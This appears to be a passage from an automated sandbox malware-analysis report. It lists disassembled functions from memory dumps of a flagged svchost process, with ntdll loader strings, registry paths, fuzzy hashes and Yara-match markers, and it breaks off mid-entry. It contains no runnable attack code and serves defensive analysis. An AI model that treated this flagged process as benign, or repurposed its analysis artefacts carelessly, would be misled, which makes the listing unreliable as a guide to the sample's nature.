                                                                                                                                                                              Function 030EC188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 030EC1C5
                                                                                                                                                                              • PreferredUILanguages, xrefs: 030EC212
                                                                                                                                                                              • @, xrefs: 030EC1F1
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                              • API String ID: 0-2968386058
                                                                                                                                                                              • Opcode ID: 85cb76c648f861ef158b72070b1c3081ae5d43d09843220cbbb4f2225a23de45
                                                                                                                                                                              • Instruction ID: f5967b0f60bc7de725feb1b170dfd806e2cd122275fc72e7772925c2f33705b3
                                                                                                                                                                              • Opcode Fuzzy Hash: 85cb76c648f861ef158b72070b1c3081ae5d43d09843220cbbb4f2225a23de45
                                                                                                                                                                              • Instruction Fuzzy Hash: B4418E76E02209EFEB11DAD8C885FEEF7FCAB44700F04406AE905BB290D7759E448B94
                                                                                                                                                                              Function 030C4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                              • API String ID: 0-1373925480
                                                                                                                                                                              • Opcode ID: 334f3714dfe2e4c9e474d33fe5bb4cc3fe6281d6b10dd06a64e0f4a4b8baaae8
                                                                                                                                                                              • Instruction ID: 92b6cb95adaf3b486723f066c926beab352dcda3a44fda2d1c5417010e36fd92
                                                                                                                                                                              • Opcode Fuzzy Hash: 334f3714dfe2e4c9e474d33fe5bb4cc3fe6281d6b10dd06a64e0f4a4b8baaae8
                                                                                                                                                                              • Instruction Fuzzy Hash: 9041C2759127988BEB26DB9AC860BEDB7F8FF95340F1804ADD841AF791D6748901CB10
                                                                                                                                                                              Function 030B4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 030B4888
                                                                                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 030B4899
                                                                                                                                                                              • LdrpCheckRedirection, xrefs: 030B488F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                              • API String ID: 0-3154609507
                                                                                                                                                                              • Opcode ID: 7181af56abaa0d5343fff7b413f45951a94c0332098b691f338f83326f2b2468
                                                                                                                                                                              • Instruction ID: 0847957bdedfaad28cc59097f25d5c438066ad0aff45fadefd42c8959b808662
                                                                                                                                                                              • Opcode Fuzzy Hash: 7181af56abaa0d5343fff7b413f45951a94c0332098b691f338f83326f2b2468
                                                                                                                                                                              • Instruction Fuzzy Hash: 4741D832A027519FCB61CE5AD440AABB7F8EF49A50F090569EC58DB353D730DA10CB91
                                                                                                                                                                              Function 030633A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlCreateActivationContext, xrefs: 030A29F9
                                                                                                                                                                              • SXS: %s() passed the empty activation context data, xrefs: 030A29FE
                                                                                                                                                                              • Actx , xrefs: 030633AC
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                              • API String ID: 0-859632880
                                                                                                                                                                              • Opcode ID: 513933521200bb33173a16f2dee889a57ad0786bee5283eddc34af6358699a33
                                                                                                                                                                              • Instruction ID: bd2c51098f81c2875909f209309ea3e7480b13d0630bbcdddaea61d61fd49d98
                                                                                                                                                                              • Opcode Fuzzy Hash: 513933521200bb33173a16f2dee889a57ad0786bee5283eddc34af6358699a33
                                                                                                                                                                              • Instruction Fuzzy Hash: 243105366027059FDB26DE58D880B9AB7E8AB84710F0948A9E9059F695C770E851C7D0
                                                                                                                                                                              Function 03061607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • LdrpInitializeTls, xrefs: 030A1A47
                                                                                                                                                                              • minkernel\ntdll\ldrtls.c, xrefs: 030A1A51
                                                                                                                                                                              • DLL "%wZ" has TLS information at %p, xrefs: 030A1A40
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                                                                                                                              • API String ID: 0-931879808
                                                                                                                                                                              • Opcode ID: 7561dffbf46db5cefae2e087ea4183c21bcac627ec5dc2de3673f7fd4770aa08
                                                                                                                                                                              • Instruction ID: 6c60b400fc8507d5de7c7469c8b653de27e2cdcd883c226a323ce5d20f026c64
                                                                                                                                                                              • Opcode Fuzzy Hash: 7561dffbf46db5cefae2e087ea4183c21bcac627ec5dc2de3673f7fd4770aa08
                                                                                                                                                                              • Instruction Fuzzy Hash: 8F314635A02304BFDB2CDB48CD85FBAB6BDEB99714F040469F404BB184E770AD6087A0
                                                                                                                                                                              Function 03071270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0307127B
                                                                                                                                                                              • BuildLabEx, xrefs: 0307130F
                                                                                                                                                                              • @, xrefs: 030712A5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                                              • API String ID: 0-3051831665
                                                                                                                                                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                              • Instruction ID: d1a2a365bcf6d8a9e902d2366172bc9b22dd79bab80d3659be72b0c29f22217c
                                                                                                                                                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                                              • Instruction Fuzzy Hash: ED319176E0261CAFDB15EF95CC44EEEBBBDEB84750F004425E914AB1A0D730DA05CB58
                                                                                                                                                                              Function 030B20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 030B2104
                                                                                                                                                                              • LdrpInitializationFailure, xrefs: 030B20FA
                                                                                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 030B20F3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                              • API String ID: 0-2986994758
                                                                                                                                                                              • Opcode ID: 7ab6c45cfac0dec26e43bbc2ca1fe94524e47394c2718b6a097fe77428679457
                                                                                                                                                                              • Instruction ID: 58db098fa1d91028d186abf5680badb0e0c4f6342feee99fd7dcdfbdd85a2ff3
                                                                                                                                                                              • Opcode Fuzzy Hash: 7ab6c45cfac0dec26e43bbc2ca1fe94524e47394c2718b6a097fe77428679457
                                                                                                                                                                              • Instruction Fuzzy Hash: 62F0C835642308BFD728E64CDC42FD977BCEB94B54F140855F6507F685D2F0A560CA51
                                                                                                                                                                              Function 030403E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ___swprintf_l
                                                                                                                                                                              • String ID: #%u
                                                                                                                                                                              • API String ID: 48624451-232158463
                                                                                                                                                                              • Opcode ID: 2ad413bc5720362b710a96df999ec5f784e0897365ed4b9bb0e1843d07158d71
                                                                                                                                                                              • Instruction ID: 36db638c617d30f561691dac185fdbb8f9ae39d5bf112473ba0cc460dfde8038
                                                                                                                                                                              • Opcode Fuzzy Hash: 2ad413bc5720362b710a96df999ec5f784e0897365ed4b9bb0e1843d07158d71
                                                                                                                                                                              • Instruction Fuzzy Hash: CD714CB5A022499FDB05DF99D990BEEB7F8AF48304F154065E905AB251E734EE01CB60
                                                                                                                                                                              Function 030D705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                                                              • String ID: kLsE
                                                                                                                                                                              • API String ID: 3446177414-3058123920
                                                                                                                                                                              • Opcode ID: c5b14107be8d9bdf79a7411e76144f66b11465d419aa3a7a0e89c3c812590834
                                                                                                                                                                              • Instruction ID: d3bcd14fdd87b5e7c1a76ea7c133babe748407790044ce02320346a5d8f82050
                                                                                                                                                                              • Opcode Fuzzy Hash: c5b14107be8d9bdf79a7411e76144f66b11465d419aa3a7a0e89c3c812590834
                                                                                                                                                                              • Instruction Fuzzy Hash: 80417835503355ABE739FF69E844BA97FD4AB94B24F180218EDA05E0C9CBB444E1CBB0
                                                                                                                                                                              Function 030452A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: @$@
                                                                                                                                                                              • API String ID: 0-149943524
                                                                                                                                                                              • Opcode ID: ed5742b7fc386b1f02eed35198a16b3634be804ab00d896017dc95dc5212d987
                                                                                                                                                                              • Instruction ID: 94da3ed9091d03cbd090d1bdbc487e455519825d047a9723186c8904469f788f
                                                                                                                                                                              • Opcode Fuzzy Hash: ed5742b7fc386b1f02eed35198a16b3634be804ab00d896017dc95dc5212d987
                                                                                                                                                                              • Instruction Fuzzy Hash: D132CCB450A3118BDB64CF18C880B7EF7E5EF8A754F18492EF8859B290E735CA40DB52
                                                                                                                                                                              Function 030FA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: `$`
                                                                                                                                                                              • API String ID: 0-197956300
                                                                                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                              • Instruction ID: 74c32048e5223b09b5b3781b9a14089fe07b4505e6c2b11b50afed0a765aaebe
                                                                                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                                                                              • Instruction Fuzzy Hash: 1BC1AC313053469FDB24CE28C841B6BFBE5AFC4718F088A2DF6998AA90D775E505CF91
                                                                                                                                                                              Function 03030CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • ResIdCount less than 2., xrefs: 0308EEC9
                                                                                                                                                                              • Failed to retrieve service checksum., xrefs: 0308EE56
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
                                                                                                                                                                              • API String ID: 0-863616075
                                                                                                                                                                              • Opcode ID: 4eafea79270065e136345daf0e1c5d3cacf522d438d782faac4cba7796192f4d
                                                                                                                                                                              • Instruction ID: dcd40f970afcf2de9ff8b21b913d212df072cdc292f5f84b987ab76a1180f8e3
                                                                                                                                                                              • Opcode Fuzzy Hash: 4eafea79270065e136345daf0e1c5d3cacf522d438d782faac4cba7796192f4d
                                                                                                                                                                              • Instruction Fuzzy Hash: C8E1E2B59097449FE364CF16C440BABFBE4FB88314F008A2EE5D99B280DB719949CF56
                                                                                                                                                                              Function 00402700 Relevance: 2.8, Strings: 2, Instructions: 291COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: VUUU$gfff
                                                                                                                                                                              • API String ID: 0-2662692612
                                                                                                                                                                              • Opcode ID: 9c5eac5b087535b218bd33e27cf9e684ee2180f6cd4eab53f46fb8ff3ab0981b
                                                                                                                                                                              • Instruction ID: eebd4cb39ea811ab55bf7c88fd2d7f0708870b2e4eaabba982c7419c48d13ffc
                                                                                                                                                                              • Opcode Fuzzy Hash: 9c5eac5b087535b218bd33e27cf9e684ee2180f6cd4eab53f46fb8ff3ab0981b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1A91D472B0011A4BCF1CDA5CCE952AEB295EB98308F18823BED55EF7D1E5B89D1187C4
                                                                                                                                                                              Function 0304F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: $$$
                                                                                                                                                                              • API String ID: 0-233714265
                                                                                                                                                                              • Opcode ID: f58a54301a731edd541b7dbe3d45ac228a6a6304ec0eb20be266f6acdd08a518
                                                                                                                                                                              • Instruction ID: c29beed32028588c604be3680e5eddc318c42b0e0f9f54163c542693ab0436f1
                                                                                                                                                                              • Opcode Fuzzy Hash: f58a54301a731edd541b7dbe3d45ac228a6a6304ec0eb20be266f6acdd08a518
                                                                                                                                                                              • Instruction Fuzzy Hash: B7619CB5A0274ADFDB20DFA4C580BADB7F6FF88704F184469D515AF680CB74AA41CB90
                                                                                                                                                                              Function 0303A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0303A309
                                                                                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0303A2FB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                                                                              • API String ID: 0-2876891731
                                                                                                                                                                              • Opcode ID: 50a24fc62a54443e8ab4c01b2c5765f568b247b54cb3ebba406c260d88fab3a3
                                                                                                                                                                              • Instruction ID: 673e30ff316efe91527e8f6917ca230a34723ddb313d68a85399e9ac601415c6
                                                                                                                                                                              • Opcode Fuzzy Hash: 50a24fc62a54443e8ab4c01b2c5765f568b247b54cb3ebba406c260d88fab3a3
                                                                                                                                                                              • Instruction Fuzzy Hash: 9041AE75B06649EBDB11CF69C840BAEB7F8EF86700F1844A6EC44DB291E335D940CB55
                                                                                                                                                                              Function 0306329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: .Local\$@
                                                                                                                                                                              • API String ID: 0-380025441
                                                                                                                                                                              • Opcode ID: fca41c4d8a20400462e3d75e5e5dcf7f8bfbd88216bedbce57d913b0c2cac52a
                                                                                                                                                                              • Instruction ID: 76e552285e4c492136d58ec36078f4f0a96119e3ba52b5520ad7d98ac0e8c698
                                                                                                                                                                              • Opcode Fuzzy Hash: fca41c4d8a20400462e3d75e5e5dcf7f8bfbd88216bedbce57d913b0c2cac52a
                                                                                                                                                                              • Instruction Fuzzy Hash: 8631B5B950A314AFC350DF28C880A9FBBE8FBC5654F48096EF59587260DA31DD04CBD6
                                                                                                                                                                              Function 0303C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: MUI
                                                                                                                                                                              • API String ID: 0-1339004836
                                                                                                                                                                              • Opcode ID: 7bf55cb3bf180ef34fd9dd0b2054c6a866b5ac7481d7aa0351c8ed8f95cec5b8
                                                                                                                                                                              • Instruction ID: 41b360a012ad704890f08f87c5cb7d97f6583d1cdd0696e569322382d3d3a43f
                                                                                                                                                                              • Opcode Fuzzy Hash: 7bf55cb3bf180ef34fd9dd0b2054c6a866b5ac7481d7aa0351c8ed8f95cec5b8
                                                                                                                                                                              • Instruction Fuzzy Hash: 28823B75E022189FEB64CFA9C880BEDF7B9BF4A710F188569E859EB250D7309D41CB50
                                                                                                                                                                              Function 03082F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: P`vRbv
                                                                                                                                                                              • API String ID: 0-2392986850
                                                                                                                                                                              • Opcode ID: 997acb0f6f0a70ad5395fda872c8f8e98442976c040c4eed067f8ddd5f305a5e
                                                                                                                                                                              • Instruction ID: 8eb03598a5477123ba49a4b47124b7277ac4f49a31b20cb0d783775c84f33972
                                                                                                                                                                              • Opcode Fuzzy Hash: 997acb0f6f0a70ad5395fda872c8f8e98442976c040c4eed067f8ddd5f305a5e
                                                                                                                                                                              • Instruction Fuzzy Hash: E542037DD06259AADF69EFA8C4446BDFBF4AF84B10F1C84DAD4C1AB280D7348981CB54
                                                                                                                                                                              Function 03037370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: f7290d9976037c7302f9c7bdb418432e0892c74d41a307eb5c01d30e02e334fc
                                                                                                                                                                              • Instruction ID: 9c55e86f81da92d8406052f1445668c28662378fbc2726e2842738ad701a9e1a
                                                                                                                                                                              • Opcode Fuzzy Hash: f7290d9976037c7302f9c7bdb418432e0892c74d41a307eb5c01d30e02e334fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 37A18BB5609342CFD724DF28C480A2BBBE9BF89704F144DAEE5858B350E770E945CB92
                                                                                                                                                                              Function 03052E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                              • Opcode ID: 45d270b4249ea05a8b60fe3cc8b30fa7e6f64d650bbb1fc19cfa406b4d7b5a50
                                                                                                                                                                              • Instruction ID: c9c990d346957b71609c863fe5594e40f0f6758b64353e1e3267419fa2d1bec4
                                                                                                                                                                              • Opcode Fuzzy Hash: 45d270b4249ea05a8b60fe3cc8b30fa7e6f64d650bbb1fc19cfa406b4d7b5a50
                                                                                                                                                                              • Instruction Fuzzy Hash: 27F19D7960A745CFDB65CF28C490B6BBBE5AFC8650F0948ADFC898B240DB30D945CB52
                                                                                                                                                                              Function 00416EE3 Relevance: 1.7, Strings: 1, Instructions: 423COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2272128880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 0-3887548279
                                                                                                                                                                              • Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                              • Instruction ID: e9bdda55f84abc2fd555cb17e84cc2cb905fd1a83ffcf530ee59993d0cd48a92
                                                                                                                                                                              • Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
                                                                                                                                                                              • Instruction Fuzzy Hash: A9021DB6E006189FDB14CF9AD8805DDFBF2FF88314F1AC1AAD859A7315D6746A418F80
                                                                                                                                                                              Function 03032FC8 Relevance: 1.7, Strings: 1, Instructions: 410COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: PATH
                                                                                                                                                                              • API String ID: 0-1036084923
                                                                                                                                                                              • Opcode ID: 6b0f4356fd5f45d6058e969ed26c421ba4aca574b10a23ee9908bf6f4807d2a3
                                                                                                                                                                              • Instruction ID: f12b9066f80884d7e8461151aad89192b376d44345807cd6525409e251b5d07b
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b0f4356fd5f45d6058e969ed26c421ba4aca574b10a23ee9908bf6f4807d2a3
                                                                                                                                                                              • Instruction Fuzzy Hash: A9F1D179D01218EBCB29DF99D8C0AFEB7F9FF89700F488069E440AB250D774A851CB65
                                                                                                                                                                              Function 0306F603 Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000002.00000002.2273408826.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_2_2_3000000_svchost.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 9c3392251bc09950394c59591d9f8116871311ec335130abc6d5c424e765f72f
                                                                                                                                                                              • Instruction ID: 454d07413ffc4edff9aaa9554223aa7fab8f2504b92fa923bb225e516691f2da
                                                                                                                                                                              • Opcode Fuzzy Hash: 9c3392251bc09950394c59591d9f8116871311ec335130abc6d5c424e765f72f
                                                                                                                                                                              • Instruction Fuzzy Hash: F14158B4D01288EFDB24DFA9D880AEEFBF4FB48300F14856EE859A7215D7319950CB60
                                                                                                                                                                              Function 03030100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
